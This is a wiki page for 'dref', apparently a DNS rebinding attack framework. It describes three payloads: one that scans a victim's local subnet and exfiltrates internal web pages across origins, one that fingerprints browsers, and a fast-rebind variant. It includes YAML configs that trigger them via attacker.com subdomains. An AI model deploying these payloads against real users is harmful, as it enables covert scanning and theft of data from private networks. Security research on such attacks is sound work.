-
Notifications
You must be signed in to change notification settings - Fork 70
Payloads
The web-discover
payload will fetch the browser's local IP address using WebRTC, and from there derive a /24
subnet.
It will proceed to use netmap.js
to scan the subnet for live web services on ports 80
and 8080
.
When the scan is complete it will open rebind iFrames for each web service found, configure the DNS records to point to the local services, and then fetch the services' index pages.
It will POST the HTML responses back to dref, effectively exfiltrating data across origins.
The payload will take several minutes to run to completion.
dref/scripts/src/payloads/web-discover.js
To configure the payload, edit dref-config.yml
:
targets:
- target: "demo"
script: "web-discover"
The payload can be triggered by visiting http://demo.attacker.com/
.
This payload does not use DNS rebinding. It simply exfiltrates information about the browser that may be of use to an attacker, such as version information, configuration etc.
dref/scripts/src/payloads/sysinfo.js
To configure the payload, edit dref-config.yml
:
targets:
- target: "sysinfo"
script: "sysinfo"
The payload can be triggered by visiting http://sysinfo.attacker.com/
.
The Fast Rebind payload showcases the fastRebind
configuration key, which enables near-instant DNS rebinding. This does not work all the time, and is inconsistent between browsers/OSs. This attack will work 50% of the time on Chrome on MacOS (can and will be improved to 100%).
The advantage of fastRebind
is that victims need only stay a couple of seconds on the website to run the full attack, instead of the 60 seconds required for the universal, stable, DNS rebinding attack.
dref/scripts/src/payloads/fast-rebind.js
To configure the payload, edit dref-config.yml
:
targets:
- target: "fast-rebind"
script: "fast-rebind"
fastRebind: true
args:
host: "192.168.1.1"
port: 80
path: "/index.html"
The payload can be triggered by visiting http://fast-rebind.attacker.com/
.